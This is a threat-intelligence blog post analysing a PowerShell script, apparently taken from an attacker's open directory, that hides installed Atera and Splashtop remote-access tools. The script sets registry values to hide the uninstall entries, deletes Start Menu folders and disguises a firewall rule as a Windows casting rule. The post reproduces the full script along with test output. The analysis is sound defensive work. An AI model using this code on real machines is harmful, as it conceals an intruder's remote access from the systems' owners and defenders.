Removing Traces of RMM Tools
Table of Contents
Introduction
Fox_threatintel tweeted recently about an open directory on 91.215.85.18:9380/. I downloaded all the files from this directory and stumbled upon a ‘cleaner’ script, which we will examine in this short blog post. The original script is available on VirusTotal.
Find installed software
First, the script defines an array ($uninstallKeys), holding two registry keys:
$uninstallKeys = @(
"HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall",
"HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall"
)
In our case, the script explicitly searches for the RMM products Atera and Splashtop:
$softwareNamesToFind = @("AteraAgent", "Splashtop Streamer")
The script then iterates over the values in the two registry keys, searching for names within the defined array $softwareNamesToFind (Atera and Splashtop, see above):
foreach ($uninstallKey in $uninstallKeys) {
Get-ChildItem -Path $uninstallKey | ForEach-Object {
$displayName = (Get-ItemProperty -Path $_.PSPath).DisplayName
foreach ($softwareName in $softwareNamesToFind) {
if ($displayName -eq $softwareName) {
Write-Host "$softwareName найден в $_.PSPath"
$foundSoftwareKeys += $_.PSPath
}
}
}
}
If the script finds an installed Atera or Splashtop installation, the value “SystemComponent” is set to 1 within the registry key, which “hides” the entry from the graphical interface (Apps & features) and might fool some tools.
foreach ($softwareKeyPath in $foundSoftwareKeys) {
Write-Host "Установка значения SystemComponent в 1 для $softwareKeyPath"
Set-ItemProperty -Path $softwareKeyPath -Name "SystemComponent" -Value 1 -Type DWORD
}
Removing folders
After “hiding” two possible entries from the Installation / Uninstallation menu, the script next tries to clean up installation folders:
$foldersToDelete = @(
"*Atera*",
"Anydesk Custom Client",
"Splashtop Remote"
)
The code recursively traverses through the “Start Menu” and the ProgramData folder, taking notes of every item within a folder marked to delete (see above, the array $foldersToDelete). The items within the folders and the files themselves are removed with the PowerShell command Remove-Item.
$startMenuPath = "$env:APPDATA\Microsoft\Windows\Start Menu\Programs"
$programDataPath = "$env:ProgramData\Microsoft\Windows\Start Menu\Programs"
foreach ($folderName in $foldersToDelete) {
$startMenuItems = Get-ChildItem -Path "$startMenuPath" -Filter $folderName -Recurse
$programDataItems = Get-ChildItem -Path "$programDataPath" -Filter $folderName -Recurse
foreach ($item in $startMenuItems) {
Remove-Item -Path $item.FullName -Force -Recurse
Write-Host "Удалена папка $($item.Name) из папки AppData."
}
foreach ($item in $programDataItems) {
Remove-Item -Path $item.FullName -Force -Recurse
Write-Host "Удалена папка $($item.Name) из папки ProgramData."
}
}
Remove traces in the Firewall Rules
Last, the script changes the name of the Splashtop firewall rule with the command Set-NetFirewallRule. The comment inside the code reads, translated from Russian to English: Change the name and description of the rule to “Cast to Device streaming server (HTTP-Streaming-In):
$splashtopRuleName = Get-NetFirewallRule | Where-Object { $_.DisplayName -like "*Splashtop*" } | Select-Object -ExpandProperty Name
# Изменить название и описание правила на "Cast to Device streaming server (HTTP-Streaming-In)"
if ($splashtopRuleName) {
Set-NetFirewallRule -Name $splashtopRuleName -NewDisplayName "Cast to Device streaming server (HTTP-Streaming-In)" -Description "Inbound rule for the Cast to Device server to allow streaming using HTTP. [TCP 10247]"
Write-Host "Название и описание правила брандмауэра для Splashtop Streamer изменены."
} else {
Write-Host "Правило брандмауэра для Splashtop Streamer не найдено."
}
Testing
I installed Splashtop Streamer on a test machine and ran the PowerShell code. I received the following output:
Splashtop Streamer найден в HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{B7C5EA94-B96A-41F5-BE95-25D78B486678}.PS
Path
Установка значения SystemComponent в 1 для Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\
Uninstall\{B7C5EA94-B96A-41F5-BE95-25D78B486678}
Удалена папка Splashtop Remote из папки ProgramData.
Название и описание правила брандмауэра для Splashtop Streamer изменены.
Here is the translated version:
Splashtop Streamer found in HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{B7C5EA94-B96A-41F5-BE95-25D78B486678}.PS
Path
Setting the SystemComponent value to 1 for Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\
Uninstall\{B7C5EA94-B96A-41F5-BE95-25D78B486678}
Removed Splashtop Remote folder from the ProgramData folder.
The name and description of the firewall rule for Splashtop Streamer have been changed.
Indeed, Splashtop is no longer visible in the App & features window. However, by toggling the SystemComponent back to 0, the entry becomes visible again.
And yes, also, the firewall rule has changed - but the App is still a giveaway, pointing to Splashtop :)
Conclusion
Honestly, I have no idea who came up with this script and thinks it covers enough tracks. Under certain circumstances, ordinary users could be fooled, making them believe that no RMM software was installed on their computers. However, we could consult various other forensic artifacts to find out what software was installed or running on computers or servers, so that these small changes would make little difference here.